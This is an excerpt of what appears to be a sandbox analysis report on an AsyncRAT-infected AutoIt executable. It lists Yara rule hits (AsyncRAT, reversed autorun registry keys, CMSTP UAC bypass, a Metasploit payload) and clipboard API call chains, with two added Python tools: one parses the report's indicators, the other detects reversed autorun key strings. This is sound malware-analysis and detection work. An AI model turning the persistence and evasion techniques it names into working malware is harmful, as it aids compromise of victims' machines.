Source: Yara match | File source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009DEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009DEAFF
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009DED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009DED6A
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009CACDA GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,0_2_009CACDA
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009F9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009F9576
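The evidence lines in this section (the bidirectional port pairs, the decoded TLS sessions, the Yara hits per process and per unpacked artifact, and the Win32 call chains above) are what an analyst actually mines from a report like this, and the "Matched rule" lines in the System Summary that follows have the same shape. The extractor below is an added example, not Joe Sandbox code: the function names and regexes are mine, and SAMPLE is a hand-picked subset of this report's own lines. It collapses the port pairs (each flow is listed once per direction) into flows, lists the 443 flows that never appear as a decoded TLS session, maps Yara hits to PIDs and artifacts, and classifies each clipboard call chain as read or write. The regexes key on the detail phrase rather than on the column boundary, so they also work on the fused HTML-to-text form ("unknownNetwork traffic detected ...").

```python
"""Pull structured indicators out of Joe Sandbox evidence lines.

Added example, not Joe Sandbox code: regexes and function names are the
author's own; SAMPLE is a hand-picked subset of lines from this report.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of this report's own evidence lines.
SAMPLE = r"""
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | HTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49821 version: TLS 1.2
Source: Yara match | File source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009DEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009DEAFF
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009DED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009DED6A
"""
SAMPLE_LINES = [l for l in SAMPLE.splitlines() if l.strip()]

# Patterns search for the detail phrase, so a missing " | " separator is fine.
PORT_PAIR = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_CONN = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)")
YARA_PROC = re.compile(r"Process Memory Space: (\S+) PID: (\d+)")
RULE_MATCH = re.compile(
    r"Source:\s*(.+?),\s*type:\s*(\w+?)\s*\|?\s*Matched rule: (.+?) Author: (\S+)")
# The function id opens the chain and is repeated after the last API.
CODE_FUNC = re.compile(r"Code function: (\w+) (.+?),\s*\1\s*$")

CLIPBOARD_READ = {"GetClipboardData"}
CLIPBOARD_WRITE = {"SetClipboardData"}


def port_pairs(lines):
    """Server port -> set of client ports. '443 -> 49821' and '49821 -> 443'
    are the same flow; the lower port is taken as the server side."""
    flows = defaultdict(set)
    for m in filter(None, map(PORT_PAIR.search, lines)):
        a, b = int(m.group(1)), int(m.group(2))
        flows[min(a, b)].add(max(a, b))
    return dict(flows)


def tls_sessions(lines):
    """Server IP -> sorted client ports for flows the sandbox decoded as TLS."""
    sessions = defaultdict(set)
    for m in filter(None, map(TLS_CONN.search, lines)):
        sessions[m.group(1)].add(int(m.group(4)))
    return {ip: sorted(ports) for ip, ports in sessions.items()}


def flows_without_tls(lines, server_port=443):
    """Client ports that reached server_port but have no decoded TLS session:
    plaintext on 443, an aborted handshake, or a flow the sandbox did not
    attribute. These are the ones to pull out of the pcap by hand."""
    decoded = {p for ports in tls_sessions(lines).values() for p in ports}
    return port_pairs(lines).get(server_port, set()) - decoded


def yara_hit_processes(lines):
    """Process name -> PID for every 'Process Memory Space' Yara hit."""
    return {m.group(1): int(m.group(2))
            for m in filter(None, map(YARA_PROC.search, lines))}


def rules_by_artifact(lines):
    """Rule name -> set of unpacked PEs / memory dumps it matched."""
    hits = defaultdict(set)
    for m in filter(None, map(RULE_MATCH.search, lines)):
        hits[m.group(3)].add(m.group(1))
    return dict(hits)


def api_chains(lines):
    """Function id -> ordered list of Win32 APIs it calls."""
    return {m.group(1): [a.strip() for a in m.group(2).split(",") if a.strip()]
            for m in filter(None, map(CODE_FUNC.search, lines))}


def clipboard_ops(lines):
    """Function id -> {'read', 'write'}. Capability only: a generic runtime's
    clipboard helper compiles to the same chain, so this says the binary can
    touch the clipboard, not that it steals from it."""
    ops = {}
    for func, apis in api_chains(lines).items():
        kinds = {k for k, need in (("read", CLIPBOARD_READ), ("write", CLIPBOARD_WRITE))
                 if need & set(apis)}
        if kinds:
            ops[func] = kinds
    return ops


if __name__ == "__main__":
    print("TLS sessions:", tls_sessions(SAMPLE_LINES))
    print("443 flows with no decoded TLS:", sorted(flows_without_tls(SAMPLE_LINES)))
    print("Processes with Yara hits:", yara_hit_processes(SAMPLE_LINES))
    print("Rule hits:", {r: len(a) for r, a in rules_by_artifact(SAMPLE_LINES).items()})
    print("Clipboard use:", clipboard_ops(SAMPLE_LINES))
```

Run it as a script for a summary of the sample, or pass the full report text as `lines`. On the full section, the 443 flows with no decoded TLS session are the client ports that appear only in the port-pair lines (49754, 49843, 49846 through 49849 and 49854 in this report), which is where to look first in the pcap. The clipboard classification is deliberately a capability statement: the OpenClipboard/GetClipboardData/GlobalLock sequence in 0_2_009DEAFF is also exactly what a generic runtime clipboard helper (AutoIt's ClipGet, for instance) compiles to, so the "read" result says the binary can read the clipboard, not that it exfiltrates it; the AsyncRAT rule matches in the System Summary carry the actual verdict.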

System Summary

Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 50.2.c7f37422c5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.935372fb1f.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000023.00000002.22887398976.000000000A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                                Source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                                Source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
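The repeated hits above for the "reversed ASEP Autorun registry keys" rule are worth understanding outside YARA: the payload stores autorun key paths backwards so a plain string scan for `CurrentVersion\Run` finds nothing, and reverses them again at runtime. The following is an added example, not part of the Joe Sandbox report and not ditekSHen's rule: it takes a small, assumed list of autorun key paths, reverses them, and searches a buffer for the result in both ASCII and UTF-16LE (the encoding a .NET payload such as AsyncRAT keeps its strings in). The sample buffer is constructed for the demonstration.

```python
"""Find reversed ASEP (autorun) registry key paths in a byte buffer.

Added example. The key list is an assumption for illustration; it is not the
string set of ditekSHen's INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse rule.
"""
import sys

# Autorun key paths that malware commonly writes to. Stored reversed in the
# binary to defeat naive string scanners, reversed back at runtime.
ASEP_KEYS = [
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
    r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon",
]

ENCODINGS = ("ascii", "utf-16-le")


def find_reversed_asep(buf: bytes):
    """Return (key, encoding, offset) for each reversed key path found in buf.

    Matching is case-insensitive. bytes.lower() folds only ASCII letters,
    which is exactly right for both the ASCII and the UTF-16LE (NUL-padded
    ASCII) encodings of these paths.
    """
    haystack = buf.lower()
    hits = []
    for key in ASEP_KEYS:
        reversed_key = key[::-1].lower()
        for enc in ENCODINGS:
            needle = reversed_key.encode(enc)
            start = 0
            while (off := haystack.find(needle, start)) != -1:
                hits.append((key, enc, off))
                start = off + 1
    return hits


def scan_file(path: str):
    """Scan a file on disk (an unpacked PE, a memory dump) for reversed keys."""
    with open(path, "rb") as fh:
        return find_reversed_asep(fh.read())


# Constructed sample: a fake MZ stub, one reversed key in ASCII, one reversed
# key in UTF-16LE, and one forward (unreversed) key that must NOT match.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS"
    + b"\x00" * 8
    + "ecnOnuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS".encode("utf-16-le")
    + b"\x00" * 8
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
)

if __name__ == "__main__":
    results = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_reversed_asep(SAMPLE)
    for key, enc, off in results:
        print(f"0x{off:08x} {enc:9} {key}")
```

Note that the reversed `...\Run` path is a substring of the reversed `...\RunOnce` path, so a RunOnce hit also produces a Run hit a few bytes further in; collapse overlapping offsets if you only want one finding per location.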
Source: QkRFz2sau5.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: QkRFz2sau5.exe, 00000000.00000002.22057112305.0000000000A22000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
